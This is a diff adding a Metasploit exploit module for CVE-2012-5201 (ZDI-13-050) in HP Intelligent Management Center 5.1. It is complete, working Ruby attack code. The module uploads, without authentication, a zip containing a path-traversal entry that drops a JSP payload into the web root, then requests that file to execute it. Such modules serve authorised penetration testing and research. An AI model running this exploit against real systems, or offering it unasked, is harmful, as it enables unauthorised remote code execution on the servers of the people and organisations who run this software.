Added module for ZDI-13-050

modules/exploits/windows/http/hp_imc_mibfileupload.rb

@@ -0,0 +1,115 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::FileDropper
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'HP Intelligent Management Center Arbitrary File Upload',
+			'Description' => %q{
+					This module exploits a code execution flaw in HP Intelligent Management Center.
+				The vulnerability exists in the mibFileUpload which is accepting unauthenticated
+				file uploads and handling zip contents in a insecure way. Combining both weaknesses
+				a remote attacker can accomplish arbitrary file upload. This module has been tested
+				successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.
+			},
+			'Author'       =>
+				[
+					'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+					'juan vazquez' # Metasploit module
+				],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'CVE', '2012-5201' ],
+					[ 'OSVDB', '91026' ],
+					[ 'BID', '58385' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ],
+					[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ]
+				],
+			'Privileged'  => true,
+			'Platform'    => 'win',
+			'Arch' => ARCH_JAVA,
+			'Targets'     =>
+				[
+					[ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Mar 07 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(8080),
+				OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc'])
+			], self.class)
+	end
+
+	def check
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "login.jsf"),
+			'method' => 'GET'
+		})
+
+		if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/
+			return Exploit::CheckCode::Detected
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		@peer = "#{rhost}:#{rport}"
+
+		# New lines are handled on the vuln app and payload is corrupted
+		jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+		jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
+
+		# Zipping with CM_STORE to avoid errors while zip decompressing
+		# on the Java vulnerable application
+		zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+		zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp)
+
+		post_data = Rex::MIME::Message.new
+		post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
+
+		# Work around an incompatible MIME implementation
+		data = post_data.to_s
+		data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
+
+		print_status("#{@peer} - Uploading the JSP payload...")
+		res = send_request_cgi({
+			'uri'    => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"),
+			'method' => 'POST',
+			'data'   => data,
+			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+			'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}"
+		})
+
+		if res and res.code == 200 and res.body.empty?
+			print_status("#{@peer} - JSP payload uploaded successfully")
+			register_files_for_cleanup(jsp_name)
+		else
+			fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed")
+		end
+
+		print_status("#{@peer} - Executing payload...")
+		send_request_cgi({
+			'uri'    => normalize_uri(jsp_name),
+			'method' => 'GET'
+		})
+
+	end
+
+end